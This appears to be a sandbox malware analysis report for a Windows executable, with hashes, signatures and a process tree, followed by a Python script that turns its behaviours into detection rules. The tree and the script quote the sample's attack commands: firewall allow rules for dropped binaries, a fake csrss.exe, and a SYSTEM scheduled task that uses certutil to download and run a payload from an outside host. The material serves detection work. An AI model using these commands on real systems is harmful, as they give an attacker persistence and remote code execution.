Analysis
max time kernel: 39s
max time network: 166s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 23-05-2022 21:24
Static task: static1
Behavioral task: behavioral1
  Sample: 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
  Resource: win10v2004-20220414-en
General
Target: 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
Size: 3.8MB
MD5: 2d48cb04270279d2671002d34e14153a
SHA1: 952c2fb3dc4557c49b0b91b3ee6a19083e455d81
SHA256: 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9
SHA512: aa83e36687809cb30efda459b3f510ef5878f01985b678bc7bfa7c5965fa99d9257ff270219a618e29920a8230ee8f074d96eaf04873223388e86af0be8ad62e
Malware Config
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  Processes (description | pid | process | target process):
    PID 1492 created 2152 | 1492 | svchost.exe | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
Modifies Windows Firewall (1 TTP)
Modifies boot configuration data using bcdedit (1 IoC)
  Processes (pid | process):
    740 | bcdedit.exe
Program crash (2 IoCs)
  Processes (pid | pid_target | process | target process):
    2012 | 2152 | WerFault.exe | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    3456 | 1424 | WerFault.exe | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
Creates scheduled task(s) (1 TTP, 2 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid | process):
    3600 | schtasks.exe
    2076 | schtasks.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes (pid | process):
    2152 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    2152 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    1424 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    1424 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Processes (description | pid | process):
    Token: SeDebugPrivilege | 2152 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    Token: SeImpersonatePrivilege | 2152 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    Token: SeTcbPrivilege | 1492 | svchost.exe
    Token: SeTcbPrivilege | 1492 | svchost.exe
Suspicious use of WriteProcessMemory (7 IoCs)
  Processes (description | pid | process | target process):
    PID 1492 wrote to memory of 1424 | 1492 | svchost.exe | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    PID 1492 wrote to memory of 1424 | 1492 | svchost.exe | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    PID 1492 wrote to memory of 1424 | 1492 | svchost.exe | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe
    PID 1424 wrote to memory of 4984 | 1424 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe | cmd.exe
    PID 1424 wrote to memory of 4984 | 1424 | 287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe | cmd.exe
    PID 4984 wrote to memory of 960 | 4984 | cmd.exe | netsh.exe
    PID 4984 wrote to memory of 960 | 4984 | cmd.exe | netsh.exe
Processes (tree depth as reported; PIDs in parentheses are taken from the signature tables above)
Depth 1: C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe (PID 2152)
  Command line: "C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  Depth 2: C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe (PID 1424)
    Command line: "C:\Users\Admin\AppData\Local\Temp\287621cbd3dd3c8cfa36ea8482dd66be0eba17b701a1578251ec10cf4c04afb9.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    Depth 3: C:\Windows\system32\cmd.exe (PID 4984)
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
      - Suspicious use of WriteProcessMemory
      Depth 4: C:\Windows\system32\netsh.exe (PID 960)
        Command line: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
    Depth 3: C:\Windows\system32\cmd.exe
      Command line: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes"
    Depth 3: C:\Windows\rss\csrss.exe
      Command line: C:\Windows\rss\csrss.exe ""
      Depth 4: C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
        - Creates scheduled task(s)
      Depth 4: C:\Windows\SYSTEM32\schtasks.exe
        Command line: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        - Creates scheduled task(s)
      Depth 4: C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
      Depth 4: C:\Windows\system32\bcdedit.exe (PID 740)
        Command line: C:\Windows\Sysnative\bcdedit.exe /v
        - Modifies boot configuration data using bcdedit
    Depth 3: C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 700
      - Program crash
  Depth 2: C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 724
    - Program crash
Depth 1: C:\Windows\system32\svchost.exe (PID 1492)
  Command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
Depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2152 -ip 2152
Depth 1: C:\Windows\system32\netsh.exe
  Command line: netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes
Depth 1: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1424 -ip 1424
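The process tree records three behaviours worth hunting for beyond this one sample: inbound firewall allow rules for binaries outside System32 and Program Files, a copy of the payload named csrss.exe dropped in C:\Windows\rss (a name that only ever belongs to the session manager process in System32), and two ONLOGON scheduled tasks, one of which runs certutil as SYSTEM to fetch app.exe from gfixprice.space. The Python below is an added example and not part of the sandbox report: it re-implements those signatures as standalone rules and runs them over the command lines copied from the tree. The record layout, the trusted-directory list, the PID 0 placeholders for processes the report does not tie to a PID, and the bcdedit write-verb list are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Directories system binaries are expected to run from (assumption of this example).
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")
# Core Windows processes that never legitimately run from outside System32.
SYSTEM_ONLY_IMAGES = {"csrss.exe", "smss.exe", "wininit.exe",
                      "winlogon.exe", "services.exe", "lsass.exe"}
# bcdedit verbs that write the BCD store; /v and /enum only read it.
BCDEDIT_WRITE_VERBS = ("/set", "/deletevalue", "/delete", "/create", "/import", "/default")


@dataclass(frozen=True)
class ProcEvent:
    pid: int       # 0 where the report does not tie a PID to this command line
    image: str     # executable path as recorded by the sandbox
    cmdline: str   # command line as recorded by the sandbox


def trusted_path(path: str) -> bool:
    return path.strip('"').lower().startswith(TRUSTED_PREFIXES)


def rule_masquerade(ev):
    # A system process name (csrss.exe in this report) running from a non-system directory.
    name = ev.image.rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_ONLY_IMAGES and not trusted_path(ev.image):
        return f"{name} running from {ev.image}"
    return None


def rule_firewall_allow(ev):
    # netsh advfirewall ... action=allow for a program outside the trusted directories.
    cl = ev.cmdline
    if not re.search(r"netsh\s+advfirewall\s+firewall\s+add\s+rule", cl, re.I):
        return None
    m = re.search(r'program=(?:"([^"]*)"|(\S+))', cl, re.I)
    if m and "action=allow" in cl.lower():
        prog = m.group(1) if m.group(1) is not None else m.group(2)
        if not trusted_path(prog):
            return f"inbound allow rule for {prog}"
    return None


def rule_schtasks(ev):
    # schtasks /CREATE combining privilege, a logon trigger and/or a download in its action.
    cl = ev.cmdline
    if not re.search(r"schtasks(\.exe)?\s.*?/create\b", cl, re.I):
        return None
    reasons = []
    for flag, why in ((r"/ru\s+system\b", "runs as SYSTEM"),
                      (r"/rl\s+highest\b", "highest run level"),
                      (r"/sc\s+onlogon\b", "logon trigger")):
        if re.search(flag, cl, re.I):
            reasons.append(why)
    tr = re.search(r'/tr\s+"([^"]*)"|/tr\s+(\S+)', cl, re.I)
    if tr:
        action = tr.group(1) if tr.group(1) is not None else tr.group(2)
        if re.search(r"https?://", action, re.I):
            reasons.append("URL in task action")
        if re.search(r"certutil(\.exe)?\s.*-urlcache", action, re.I):
            reasons.append("certutil download in task action")
        # First whitespace-delimited token of the action; a path with spaces
        # inside an already-quoted /TR is not handled by this example.
        first = action.split()[0] if action.split() else ""
        if "\\" in first and not trusted_path(first):
            reasons.append(f"task action from untrusted path {first}")
    # One attribute alone (e.g. ONLOGON) is routine admin use; require two.
    return "; ".join(reasons) if len(reasons) >= 2 else None


def rule_bcdedit(ev):
    # Only bcdedit invocations that write the store count as a modification.
    cl = ev.cmdline.lower()
    if "bcdedit" not in cl:
        return None
    verbs = [v for v in BCDEDIT_WRITE_VERBS if re.search(rf"\s{re.escape(v)}\b", cl)]
    return f"boot store modified via {' '.join(verbs)}" if verbs else None


RULES = (rule_masquerade, rule_firewall_allow, rule_schtasks, rule_bcdedit)


def scan(events):
    # (pid, rule name, detail) for every rule that fires on every event.
    return [(ev.pid, rule.__name__, d) for ev in events for rule in RULES if (d := rule(ev))]


# Constructed from the report's process tree. PIDs 4984 and 740 are the ones the
# report's signature tables attribute to these command lines.
SAMPLE_EVENTS = [
    ProcEvent(4984, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"'),
    ProcEvent(0, r"C:\Windows\system32\netsh.exe",
              r'netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\Admin\AppData\Roaming\f02377ff5b23\f02377ff5b23\f02377ff5b23.exe" enable=yes'),
    ProcEvent(0, r"C:\Windows\rss\csrss.exe", r'C:\Windows\rss\csrss.exe ""'),
    ProcEvent(0, r"C:\Windows\SYSTEM32\schtasks.exe",
              r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F'),
    ProcEvent(0, r"C:\Windows\SYSTEM32\schtasks.exe",
              r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F'),
    ProcEvent(740, r"C:\Windows\system32\bcdedit.exe", r"C:\Windows\Sysnative\bcdedit.exe /v"),
]

if __name__ == "__main__":
    for pid, rule, detail in scan(SAMPLE_EVENTS):
        print(f"pid={pid:<5} {rule:<20} {detail}")
```

Run stand-alone, the script flags both firewall rules, the csrss.exe masquerade and both scheduled tasks, and stays silent on PID 740. That silence is deliberate: the report tags `bcdedit.exe /v` as "Modifies boot configuration data", but `/v` only lists the store with full identifiers, so the sandbox signature is firing on the executable rather than on a change. A hunt keyed on this sample should match on the schtasks, netsh and out-of-place csrss.exe behaviour, and reserve the bcdedit rule for write verbs such as `/set` or `/deletevalue`.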
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
  Filesize: 625KB
  MD5: 8f9b2bb661cd4f2b100430caa8f075d8
  SHA1: a18ed5630b6e51bfa316a72481b515d6cec91bb0
  SHA256: ecd79655fdb39b1e3f443578d5901b7abbe531537adb2d1d6484eb28976dd4fb
  SHA512: e93fc32fa0b13f17458d6cfbe4cd6a550f787b5ff566055224c4ebcb421c145a2fc187472b3ebe66b0666183fc5f02e09d88de712c8ca228ef5769c5ad7febf5
C:\Windows\rss\csrss.exe
  Filesize: 872KB
  MD5: a324c441016f613796706d061589223e
  SHA1: e34e4d2b8af5a822d0d294a711ae3e0c24af4e5c
  SHA256: cf0e8f2ef5126008133c33e75c9d246774a5b71ac0baecbfe5b18f5ed146b9db
  SHA512: 6d66ef7ca46909ab003a0a664010f6f7bd16dfaba27f69ef1af8ee8fabae2827f611aa2968cfdd16db15b4a2a8c14cc2845c4195f02bcabe3044bd7f72d68c8f
C:\Windows\rss\csrss.exe
  Filesize: 709KB
  MD5: 8d851edb7da3d96877f02cdfbfe1fc26
  SHA1: f17bedaf06b5a79c9c53123b8d4b5801224dc268
  SHA256: 02ea309f2d05409e292c5c712d0d405e72641403eb8c0592728ca926fc10d93a
  SHA512: fab5b650c33dca0b500b0c1de8e2f80b676459ad452f2047cd830efbfde4581484a8349c66ef03827ab09bc3326c2aefdb12d1d2a79d406645ff0928b391544d
memory/708-147-0x0000000000000000-mapping.dmp
memory/740-149-0x0000000000000000-mapping.dmp
memory/960-135-0x0000000000000000-mapping.dmp
memory/1424-136-0x000000000291D000-0x0000000002CC3000-memory.dmp (Filesize: 3.6MB)
memory/1424-137-0x0000000000400000-0x0000000000BDA000-memory.dmp (Filesize: 7.9MB)
memory/1424-133-0x0000000000000000-mapping.dmp
memory/1816-139-0x0000000000000000-mapping.dmp
memory/1868-140-0x0000000000000000-mapping.dmp
memory/1868-143-0x0000000002D00000-0x00000000030A6000-memory.dmp (Filesize: 3.6MB)
memory/1868-145-0x0000000000400000-0x0000000000BDA000-memory.dmp (Filesize: 7.9MB)
memory/2076-144-0x0000000000000000-mapping.dmp
memory/2152-130-0x00000000028B9000-0x0000000002C5F000-memory.dmp (Filesize: 3.6MB)
memory/2152-132-0x0000000000400000-0x0000000000BDA000-memory.dmp (Filesize: 7.9MB)
memory/2152-131-0x0000000002C60000-0x0000000003355000-memory.dmp (Filesize: 7.0MB)
memory/3600-146-0x0000000000000000-mapping.dmp
memory/3748-138-0x0000000000000000-mapping.dmp
memory/4984-134-0x0000000000000000-mapping.dmp